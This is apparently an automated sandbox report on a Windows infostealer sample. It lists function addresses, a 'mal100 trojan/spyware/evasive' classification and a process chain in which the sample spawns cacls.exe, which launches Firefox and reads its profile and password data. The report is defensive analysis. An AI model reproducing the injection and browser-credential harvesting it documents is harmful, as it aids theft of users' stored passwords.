                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071C9F680_2_071C9F68
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071C6E070_2_071C6E07
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071CAC100_2_071CAC10
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004186833_2_00418683
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004028C03_2_004028C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004168933_2_00416893
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004101C33_2_004101C3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040E1D33_2_0040E1D3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004031E03_2_004031E0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040E3213_2_0040E321
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040E3233_2_0040E323
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004013D03_2_004013D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00402CA03_2_00402CA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0042ED133_2_0042ED13
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004025B03_2_004025B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040FF9A3_2_0040FF9A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040FFA33_2_0040FFA3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019341A23_2_019341A2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019401AA3_2_019401AA
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019381CC3_2_019381CC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018701003_2_01870100
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191A1183_2_0191A118
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019081583_2_01908158
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019120003_2_01912000
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019403E63_2_019403E6
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188E3F03_2_0188E3F0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193A3523_2_0193A352
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019002C03_2_019002C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019202743_2_01920274
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019405913_2_01940591
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018805353_2_01880535
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192E4F63_2_0192E4F6
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019244203_2_01924420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019324463_2_01932446
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187C7C03_2_0187C7C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A47503_2_018A4750
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018807703_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189C6E03_2_0189C6E0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A03_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0194A9A63_2_0194A9A6
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018969623_2_01896962
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018668B83_2_018668B8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE8F03_2_018AE8F0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188A8403_2_0188A840
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018828403_2_01882840
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01936BD73_2_01936BD7
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193AB403_2_0193AB40
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA803_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01898DBF3_2_01898DBF
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187ADE03_2_0187ADE0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188AD003_2_0188AD00
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191CD1F3_2_0191CD1F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01920CB53_2_01920CB5
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870CF23_2_01870CF2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880C003_2_01880C00
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FEFA03_2_018FEFA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01872FC83_2_01872FC8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188CFE03_2_0188CFE0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01922F303_2_01922F30
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C2F283_2_018C2F28
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A0F303_2_018A0F30
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F4F403_2_018F4F40
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193CE933_2_0193CE93
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892E903_2_01892E90
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193EEDB3_2_0193EEDB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193EE263_2_0193EE26
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880E593_2_01880E59
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188B1B03_2_0188B1B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B516C3_2_018B516C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186F1723_2_0186F172
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0194B16B3_2_0194B16B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018870C03_2_018870C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192F0CC3_2_0192F0CC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193F0E03_2_0193F0E0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019370E93_2_019370E9
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C739A3_2_018C739A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193132D3_2_0193132D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186D34C3_2_0186D34C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018852A03_2_018852A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189B2C03_2_0189B2C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019212ED3_2_019212ED
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191D5B03_2_0191D5B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019375713_2_01937571
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193F43F3_2_0193F43F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018714603_2_01871460
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193F7B03_2_0193F7B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019316CC3_2_019316CC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C56303_2_018C5630
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019159103_2_01915910
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018899503_2_01889950
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189B9503_2_0189B950
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018838E03_2_018838E0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018ED8003_2_018ED800
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189FB803_2_0189FB80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018BDBF93_2_018BDBF9
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F5BF03_2_018F5BF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193FB763_2_0193FB76
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C5AA03_2_018C5AA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01921AA33_2_01921AA3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191DAAC3_2_0191DAAC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192DAC63_2_0192DAC6
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01937A463_2_01937A46
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193FA493_2_0193FA49
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F3A6C3_2_018F3A6C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189FDC03_2_0189FDC0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01883D403_2_01883D40
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01931D5A3_2_01931D5A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01937D733_2_01937D73
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193FCF23_2_0193FCF2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F9C323_2_018F9C32
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01881F923_2_01881F92
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193FFB13_2_0193FFB1
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193FF093_2_0193FF09
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01889EB03_2_01889EB0
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_032AB3447_2_032AB344
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0328A9527_2_0328A952
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0328A9547_2_0328A954
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0328A8047_2_0328A804
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0328C7F47_2_0328C7F4
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03292EC47_2_03292EC4
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0328C5CB7_2_0328C5CB
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0328C5D47_2_0328C5D4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CA3528_2_034CA352
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034D03E68_2_034D03E6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0341E3F08_2_0341E3F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034B02748_2_034B0274
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034902C08_2_034902C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034981588_2_03498158
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034001008_2_03400100
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034AA1188_2_034AA118
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C81CC8_2_034C81CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034D01AA8_2_034D01AA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C41A28_2_034C41A2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034A20008_2_034A2000
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034347508_2_03434750
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034107708_2_03410770
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0340C7C08_2_0340C7C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0342C6E08_2_0342C6E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034105358_2_03410535
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034D05918_2_034D0591
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C24468_2_034C2446
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034B44208_2_034B4420
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034BE4F68_2_034BE4F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CAB408_2_034CAB40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C6BD78_2_034C6BD7
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0340EA808_2_0340EA80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034269628_2_03426962
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034129A08_2_034129A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034DA9A68_2_034DA9A6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0341A8408_2_0341A840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034128408_2_03412840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_033F68B88_2_033F68B8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0343E8F08_2_0343E8F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03484F408_2_03484F40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03452F288_2_03452F28
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03430F308_2_03430F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034B2F308_2_034B2F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03402FC88_2_03402FC8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0341CFE08_2_0341CFE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0348EFA08_2_0348EFA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03410E598_2_03410E59
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CEE268_2_034CEE26
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CEEDB8_2_034CEEDB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03422E908_2_03422E90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CCE938_2_034CCE93
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0341AD008_2_0341AD00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034ACD1F8_2_034ACD1F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0340ADE08_2_0340ADE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03428DBF8_2_03428DBF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03410C008_2_03410C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03400CF28_2_03400CF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034B0CB58_2_034B0CB5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C132D8_2_034C132D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_033FD34C8_2_033FD34C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0345739A8_2_0345739A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0342B2C08_2_0342B2C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034B12ED8_2_034B12ED
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034152A08_2_034152A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034DB16B8_2_034DB16B
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0344516C8_2_0344516C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_033FF1728_2_033FF172
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0341B1B08_2_0341B1B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034170C08_2_034170C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034BF0CC8_2_034BF0CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C70E98_2_034C70E9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CF0E08_2_034CF0E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CF7B08_2_034CF7B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034556308_2_03455630
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C16CC8_2_034C16CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C75718_2_034C7571
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034D95C38_2_034D95C3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034AD5B08_2_034AD5B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034014608_2_03401460
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CF43F8_2_034CF43F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CFB768_2_034CFB76
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03485BF08_2_03485BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0344DBF98_2_0344DBF9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0342FB808_2_0342FB80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CFA498_2_034CFA49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C7A468_2_034C7A46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03483A6C8_2_03483A6C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034BDAC68_2_034BDAC6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03455AA08_2_03455AA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034ADAAC8_2_034ADAAC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034B1AA38_2_034B1AA3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034199508_2_03419950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0342B9508_2_0342B950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0347D8008_2_0347D800
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034138E08_2_034138E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CFF098_2_034CFF09
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03411F928_2_03411F92
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_033D3FD58_2_033D3FD5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_033D3FD28_2_033D3FD2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CFFB18_2_034CFFB1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03419EB08_2_03419EB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03413D408_2_03413D40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C1D5A8_2_034C1D5A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034C7D738_2_034C7D73
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0342FDC08_2_0342FDC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03489C328_2_03489C32
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034CFCF28_2_034CFCF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C61BE08_2_02C61BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C5CB408_2_02C5CB40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C5CB378_2_02C5CB37
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C5AEC08_2_02C5AEC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C5AEBE8_2_02C5AEBE
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C5CD608_2_02C5CD60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C5AD708_2_02C5AD70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C652208_2_02C65220
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C634308_2_02C63430
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C7B8B08_2_02C7B8B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0372E2238_2_0372E223
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0372E1058_2_0372E105
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0372D6888_2_0372D688
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0372E5BC8_2_0372E5BC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_0372C9488_2_0372C948
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03457E54 appears 111 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0348F290 appears 105 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 033FB970 appears 279 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0347EA12 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03445130 appears 50 times
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: String function: 018EEA12 appears 86 times
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: String function: 018C7E54 appears 111 times
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: String function: 0186B970 appears 280 times
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: String function: 018FF290 appears 105 times
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: String function: 018B5130 appears 58 times
                Source: hgq5nzWJll.exe, 00000000.00000002.1400304394.0000000005810000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000000.00000002.1396336010.0000000003BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000000.00000002.1396336010.0000000003BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000000.00000002.1386586397.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000000.00000002.1401382989.00000000071D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000000.00000000.1352011685.0000000000722000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameftOqb.exe" vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000003.00000002.1965992252.00000000013FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000003.00000002.1966292766.000000000196D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exe, 00000003.00000002.1965992252.00000000013E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exeBinary or memory string: OriginalFilenameftOqb.exe" vs hgq5nzWJll.exe
                Source: hgq5nzWJll.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hgq5nzWJll.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hgq5nzWJll.exe.logJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\G8uE-69OLJump to behavior
                Source: hgq5nzWJll.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: hgq5nzWJll.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.2150447197.0000000002F85000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2619118146.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.2153081175.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.2153081175.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.2150561705.0000000002FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: hgq5nzWJll.exeVirustotal: Detection: 76%
                Source: hgq5nzWJll.exeReversingLabs: Detection: 82%
                Source: unknownProcess created: C:\Users\user\Desktop\hgq5nzWJll.exe "C:\Users\user\Desktop\hgq5nzWJll.exe"
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess created: C:\Users\user\Desktop\hgq5nzWJll.exe "C:\Users\user\Desktop\hgq5nzWJll.exe"
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
